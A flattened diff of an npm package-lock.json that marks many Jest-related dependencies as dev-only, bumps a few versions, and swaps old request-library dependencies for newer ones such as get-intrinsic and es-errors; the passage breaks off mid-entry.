"dev": true }, "convert-source-map": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==" - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==", + "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", "dev": true }, "create-jest": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", + "dev": true, "requires": { "@jest/types": "^29.6.3", "chalk": "^4.0.0", @@ -5203,25 +5516,18 @@ "version": "7.0.6", "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "dev": true, "requires": { "path-key": "^3.1.0", "shebang-command": "^2.0.0", "which": "^2.0.1" } }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "dev": true, - "requires": { - "assert-plus": "^1.0.0" - } - }, "debug": { "version": "4.3.4", "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, "requires": { "ms": "2.1.2" } @@ -5230,12 +5536,14 @@ "version": "1.5.3", "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", + "dev": true, "requires": {} }, "deepmerge": { "version": "4.3.1", "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==" + "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", + "dev": true }, "delayed-stream": { "version": "1.0.0", @@ -5246,27 +5554,31 @@ "detect-newline": { "version": "3.1.0", "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==" + "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", + "dev": true }, "diff-sequences": { "version": "29.6.3", "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==" + "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", + "dev": true }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", + "dunder-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/dunder-proto/-/dunder-proto-1.0.1.tgz", + "integrity": "sha512-KIN/nDJBQRcXw0MLVhZE9iQHmG68qAVIBg9CqmUYjmQIhgij9U5MFvrqkUL5FbtyyzZuOeOt0zdeRe4UY7ct+A==", "dev": true, "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" + "call-bind-apply-helpers": "^1.0.1", + "es-errors": "^1.3.0", + "gopd": "^1.2.0" } }, "ejs": { "version": "3.1.10", "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", + "dev": true, "requires": { "jake": "^10.8.5" } @@ -5274,45 +5586,95 @@ "electron-to-chromium": { "version": "1.5.63", "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==" + "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", + "dev": true }, "emittery": { "version": "0.13.1", "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==" + "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", + "dev": true }, "emoji-regex": { "version": "8.0.0", "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" + "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==", + "dev": true + }, + "end-of-stream": { + "version": "1.4.5", + "resolved": "https://registry.npmjs.org/end-of-stream/-/end-of-stream-1.4.5.tgz", + "integrity": "sha512-ooEGc6HP26xXq/N+GCGOT0JKCLDGrq2bQUZrQ7gyrJiZANJ/8YDTxTpQBXGMn+WbIQXNVpyWymm7KYVICQnyOg==", + "dev": true, + "requires": { + "once": "^1.4.0" + } }, "error-ex": { "version": "1.3.2", "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", + "dev": true, "requires": { "is-arrayish": "^0.2.1" } }, + "es-define-property": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/es-define-property/-/es-define-property-1.0.1.tgz", + "integrity": "sha512-e3nRfgfUZ4rNGL232gUgX06QNyyez04KdjFrF+LTRoOXmrOgFKDg4BCdsjW8EnT69eqdYGmRpJwiPVYNrCaW3g==", + "dev": true + }, + "es-errors": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/es-errors/-/es-errors-1.3.0.tgz", + "integrity": "sha512-Zf5H2Kxt2xjTvbJvP2ZWLEICxA6j+hAmMzIlypy4xcBg1vKVnx89Wy0GbS+kf5cwCVFFzdCFh2XSCFNULS6csw==", + "dev": true + }, + "es-object-atoms": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/es-object-atoms/-/es-object-atoms-1.1.1.tgz", + "integrity": "sha512-FGgH2h8zKNim9ljj7dankFPcICIK9Cp5bm+c2gQSYePhpaG5+esrLODihIorn+Pe6FGJzWhXQotPv73jTaldXA==", + "dev": true, + "requires": { + "es-errors": "^1.3.0" + } + }, + "es-set-tostringtag": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/es-set-tostringtag/-/es-set-tostringtag-2.1.0.tgz", + "integrity": "sha512-j6vWzfrGVfyXxge+O0x5sh6cvxAog0a/4Rdd2K36zCMV5eJ+/+tOAngRO8cODMNWbVRdVlmGZQL2YS3yR8bIUA==", + "dev": true, + "requires": { + "es-errors": "^1.3.0", + "get-intrinsic": "^1.2.6", + "has-tostringtag": "^1.0.2", + "hasown": "^2.0.2" + } + }, "escalade": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==" + "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", + "dev": true }, "escape-string-regexp": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==" + "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", + "dev": true }, "esprima": { "version": "4.0.1", "resolved": "https://registry.npmjs.org/esprima/-/esprima-4.0.1.tgz", - "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==" - }, + "integrity": "sha512-eGuFFw7Upda+g4p+QHvnW0RyTX/SVeJBDM/gCtMARO0cLuT2HcEKnTPvhjV6aGeqrCB/sbNop0Kszm0jsaWU4A==", + "dev": true + }, "execa": { "version": "5.1.1", "resolved": "https://registry.npmjs.org/execa/-/execa-5.1.1.tgz", "integrity": "sha512-8uSpZZocAZRBAPIEINJj3Lo9HyGitllczc27Eh5YYojjMFMn8yHMDMaUHE2Jqfq05D/wucwI4JGURyXt1vchyg==", + "dev": true, "requires": { "cross-spawn": "^7.0.3", "get-stream": "^6.0.0", @@ -5328,12 +5690,14 @@ "exit": { "version": "0.1.2", "resolved": "https://registry.npmjs.org/exit/-/exit-0.1.2.tgz", - "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==" + "integrity": "sha512-Zk/eNKV2zbjpKzrsQ+n1G6poVbErQxJ0LBOJXaKZ1EViLzH+hrLu9cdXI4zw9dBQJslwBEpbQ2P1oS7nDxs6jQ==", + "dev": true }, "expect": { "version": "29.7.0", "resolved": "https://registry.npmjs.org/expect/-/expect-29.7.0.tgz", "integrity": "sha512-2Zks0hf1VLFYI1kbh0I5jP3KHHyCHpkfyHBzsSXRFgl/Bg9mWYfMW8oD+PdMPlEwy5HNsR9JutYy6pMeOh61nw==", + "dev": true, "requires": { "@jest/expect-utils": "^29.7.0", "jest-get-type": "^29.6.3", @@ -5342,33 +5706,23 @@ "jest-util": "^29.7.0" } }, - "extend": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", - "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", - "dev": true - }, - "extsprintf": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/extsprintf/-/extsprintf-1.3.0.tgz", - "integrity": "sha512-11Ndz7Nv+mvAC1j0ktTa7fAb0vLyGGX+rMHNBYQviQDGU0Hw7lhctJANqbPhu9nV9/izT/IntTgZ7Im/9LJs9g==", - "dev": true - }, - "fast-deep-equal": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", - "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", + "fast-fifo": { + "version": "1.3.2", + "resolved": "https://registry.npmjs.org/fast-fifo/-/fast-fifo-1.3.2.tgz", + "integrity": "sha512-/d9sfos4yxzpwkDkuN7k2SqFKtYNmCTzgfEpz82x34IM9/zc8KGxQoXg1liNC/izpRM/MBdt44Nmx41ZWqk+FQ==", "dev": true }, "fast-json-stable-stringify": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/fast-json-stable-stringify/-/fast-json-stable-stringify-2.1.0.tgz", - "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==" + "integrity": "sha512-lhd/wF+Lk98HZoTCtlVraHtfh5XYijIjalXck7saUtuanSDyLMxnHhSXEDJqHxD7msR8D0uCmqlkwjCV8xvwHw==", + "dev": true }, "fb-watchman": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/fb-watchman/-/fb-watchman-2.0.2.tgz", "integrity": "sha512-p5161BqbuCaSnB8jIbzQHOlpgsPmK5rJVDfDKO91Axs5NC1uu3HRQm6wt9cd9/+GtQQIO53JdGXXoyDpTAsgYA==", + "dev": true, "requires": { "bser": "2.1.1" } @@ -5377,14 +5731,16 @@ "version": "1.0.4", "resolved": "https://registry.npmjs.org/filelist/-/filelist-1.0.4.tgz", "integrity": "sha512-w1cEuf3S+DrLCQL7ET6kz+gmlJdbq9J7yXCSjK/OZCPA+qEN1WyF4ZAf0YYJa4/shHJra2t/d/r8SV4Ji+x+8Q==", + "dev": true, "requires": { "minimatch": "^5.0.1" }, "dependencies": { "brace-expansion": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", - "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.2.tgz", + "integrity": "sha512-Jt0vHyM+jmUBqojB7E1NIYadt0vI0Qxjxd2TErW94wDz+E2LAm5vKMXXwg6ZZBTHPuUlDgQHKXvjGBdfcF1ZDQ==", + "dev": true, "requires": { "balanced-match": "^1.0.0" } @@ -5393,6 +5749,7 @@ "version": "5.1.6", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dev": true, "requires": { "brace-expansion": "^2.0.1" } @@ -5403,6 +5760,7 @@ "version": "7.1.1", "resolved": "https://registry.npmjs.org/fill-range/-/fill-range-7.1.1.tgz", "integrity": "sha512-YsGpe3WHLK8ZYi4tWDg2Jy3ebRz2rXowDxnld4bkQB00cc/1Zw9AWnC0i9ztDJitivtQvaI9KaLyKrc+hBW0yg==", + "dev": true, "requires": { "to-regex-range": "^5.0.1" } @@ -5411,103 +5769,101 @@ "version": "4.1.0", "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", + "dev": true, "requires": { "locate-path": "^5.0.0", "path-exists": "^4.0.0" } }, - "forever-agent": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/forever-agent/-/forever-agent-0.6.1.tgz", - "integrity": "sha512-j0KLYPhm6zeac4lz3oJ3o65qvgQCcPubiyotZrXqEaG4hNagNYO8qdlUrX5vwqv9ohqeT/Z3j6+yW067yWWdUw==", - "dev": true - }, "form-data": { - "version": "2.5.1", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.5.1.tgz", - "integrity": "sha512-m21N3WOmEEURgk6B9GLOE4RuWOFf28Lhh9qGYeNlGq4VDXUlJy2th2slBNU8Gp8EzloYZOibZJ7t5ecIrFSjVA==", + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/form-data/-/form-data-4.0.3.tgz", + "integrity": "sha512-qsITQPfmvMOSAdeyZ+12I1c+CKSstAFAwu+97zrnWAbIr5u8wfsExUzCesVLC8NgHuRUqNN4Zy6UPWUTRGslcA==", "dev": true, "requires": { "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", + "combined-stream": "^1.0.8", + "es-set-tostringtag": "^2.1.0", + "hasown": "^2.0.2", "mime-types": "^2.1.12" } }, - "fs-minipass": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/fs-minipass/-/fs-minipass-2.1.0.tgz", - "integrity": "sha512-V/JgOLFCS+R6Vcq0slCuaeWEdNC3ouDlJMNIsacH2VtALiu9mV4LPrHc5cDl8k5aw6J8jwgWWpiTo5RYhmIzvg==", - "dev": true, - "requires": { - "minipass": "^3.0.0" - }, - "dependencies": { - "minipass": { - "version": "3.3.6", - "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", - "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, "fs.realpath": { "version": "1.0.0", "resolved": "https://registry.npmjs.org/fs.realpath/-/fs.realpath-1.0.0.tgz", - "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==" + "integrity": "sha512-OO0pH2lK6a0hZnAdau5ItzHPI6pUlvI7jMVnxUQRtw4owF2wk8lOSabtGDCTP4Ggrg2MbGnWO9X8K1t4+fGMDw==", + "dev": true }, "fsevents": { "version": "2.3.3", "resolved": "https://registry.npmjs.org/fsevents/-/fsevents-2.3.3.tgz", "integrity": "sha512-5xoDfX+fL7faATnagmWPpbFtwh/R77WmMMqqHGS65C3vvB0YHrgF+B1YmZ3441tMj5n63k0212XNoJwzlhffQw==", + "dev": true, "optional": true }, "function-bind": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/function-bind/-/function-bind-1.1.2.tgz", - "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==" + "integrity": "sha512-7XHNxH7qX9xG5mIwxkhumTox/MIRNcOgDrxWsMt2pAr23WHp6MrRlN7FBSFpCpr+oVO0F744iUgR82nJMfG2SA==", + "dev": true }, "gensync": { "version": "1.0.0-beta.2", "resolved": "https://registry.npmjs.org/gensync/-/gensync-1.0.0-beta.2.tgz", - "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==" + "integrity": "sha512-3hN7NaskYvMDLQY55gnW3NQ+mesEAepTqlg+VEbj7zzqEMBVNhzcGYYeqFo/TlYz6eQiFcp1HcsCZO+nGgS8zg==", + "dev": true }, "get-caller-file": { "version": "2.0.5", "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", - "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==" + "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", + "dev": true + }, + "get-intrinsic": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "dev": true, + "requires": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + } }, "get-package-type": { "version": "0.1.0", "resolved": "https://registry.npmjs.org/get-package-type/-/get-package-type-0.1.0.tgz", - "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==" - }, - "get-stream": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", - "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==" + "integrity": "sha512-pjzuKtY64GYfWizNAJ0fr9VqttZkNiK2iS430LtIHzjBEr6bX8Am2zm4sW4Ro5wjWW5cAlRL1qAMTcXbjNAO2Q==", + "dev": true }, - "getpass": { - "version": "0.1.7", - "resolved": "https://registry.npmjs.org/getpass/-/getpass-0.1.7.tgz", - "integrity": "sha512-0fzj9JxOLfJ+XGLhR8ze3unN0KZCgZwiSSDz168VERjK8Wl8kVSdcu2kspd4s4wtAa1y/qrVRiAA0WclVsu0ng==", + "get-proto": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", "dev": true, "requires": { - "assert-plus": "^1.0.0" + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" } }, + "get-stream": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-6.0.1.tgz", + "integrity": "sha512-ts6Wi+2j3jQjqi70w5AlN8DFnkSwC+MqmxEzdEALB2qXZYV3X/b1CTfgPLGJNMeAWxdPfU8FO1ms3NUfaHCPYg==", + "dev": true + }, "glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", "integrity": "sha512-nFR0zLpU2YCaRxwoCJvL6UvCH2JFyFVIvwTLsIf21AuHlMskA1hhTdk+LlYJtOlYt9v6dvszD2BGRqBL+iQK9Q==", + "dev": true, "requires": { "fs.realpath": "^1.0.0", "inflight": "^1.0.4", @@ -5520,67 +5876,74 @@ "globals": { "version": "11.12.0", "resolved": "https://registry.npmjs.org/globals/-/globals-11.12.0.tgz", - "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==" + "integrity": "sha512-WOBp/EEGUiIsJSp7wcv/y6MO+lV9UoncWqxuFfm8eBwzWNgyfBd6Gz+IeKQ9jCmyhoH99g15M3T+QaVHFjizVA==", + "dev": true + }, + "gopd": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/gopd/-/gopd-1.2.0.tgz", + "integrity": "sha512-ZUKRh6/kUFoAiTAtTYPZJ3hw9wNxx+BIBOijnlG9PnrJsCcSjs1wyyD6vJpaYtgnzDrKYRSqf3OO6Rfa93xsRg==", + "dev": true }, "graceful-fs": { "version": "4.2.11", "resolved": "https://registry.npmjs.org/graceful-fs/-/graceful-fs-4.2.11.tgz", - "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==" + "integrity": "sha512-RbJ5/jmFcNNCcDV5o9eTnBLJ/HszWV0P73bc+Ff4nS/rJj+YaS6IGyiOL0VoBYX+l1Wrl3k63h/KrH+nhJ0XvQ==", + "dev": true }, - "har-schema": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/har-schema/-/har-schema-2.0.0.tgz", - "integrity": "sha512-Oqluz6zhGX8cyRaTQlFMPw80bSJVG2x/cFb8ZPhUILGgHka9SsokCCOQgpveePerqidZOrT14ipqfJb7ILcW5Q==", + "has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "dev": true + }, + "has-symbols": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/has-symbols/-/has-symbols-1.1.0.tgz", + "integrity": "sha512-1cDNdwJ2Jaohmb3sg4OmKaMBwuC48sYni5HUw2DvsC8LjGTLK9h+eb1X6RyuOHe4hT0ULCW68iomhjUoKUqlPQ==", "dev": true }, - "har-validator": { - "version": "5.1.5", - "resolved": "https://registry.npmjs.org/har-validator/-/har-validator-5.1.5.tgz", - "integrity": "sha512-nmT2T0lljbxdQZfspsno9hgrG3Uir6Ks5afism62poxqBM6sDnMEuPmzTq8XN0OEwqKLLdh1jQI3qyE66Nzb3w==", + "has-tostringtag": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/has-tostringtag/-/has-tostringtag-1.0.2.tgz", + "integrity": "sha512-NqADB8VjPFLM2V0VvHUewwwsw0ZWBaIdgo+ieHtK3hasLz4qeCRjYcqfB6AQrBggRKppKF8L52/VqdVsO47Dlw==", "dev": true, "requires": { - "ajv": "^6.12.3", - "har-schema": "^2.0.0" + "has-symbols": "^1.0.3" } }, - "has-flag": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", - "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==" - }, "hasown": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", + "dev": true, "requires": { "function-bind": "^1.1.2" } }, + "hpagent": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/hpagent/-/hpagent-1.2.0.tgz", + "integrity": "sha512-A91dYTeIB6NoXG+PxTQpCCDDnfHsW9kc06Lvpu1TEe9gnd6ZFeiBoRO9JvzEv6xK7EX97/dUE8g/vBMTqTS3CA==", + "dev": true + }, "html-escaper": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/html-escaper/-/html-escaper-2.0.2.tgz", - "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==" - }, - "http-signature": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/http-signature/-/http-signature-1.2.0.tgz", - "integrity": "sha512-CAbnr6Rz4CYQkLYUtSNXxQPUH2gK8f3iWexVlsnMeD+GjlsQ0Xsy1cOX+mN3dtxYomRy21CiOzU8Uhw6OwncEQ==", - "dev": true, - "requires": { - "assert-plus": "^1.0.0", - "jsprim": "^1.2.2", - "sshpk": "^1.7.0" - } + "integrity": "sha512-H2iMtd0I4Mt5eYiapRdIDjp+XzelXQ0tFE4JS7YFwFevXXMmOp9myNrUvCg0D6ws8iqkRPBfKHgbwig1SmlLfg==", + "dev": true }, "human-signals": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-2.1.0.tgz", - "integrity": "sha512-B4FFZ6q/T2jhhksgkbEW3HBvWIfDW85snkQgawt07S7J5QXTk6BkNV+0yAeZrM5QpMAdYlocGoljn0sJ/WQkFw==" + "integrity": 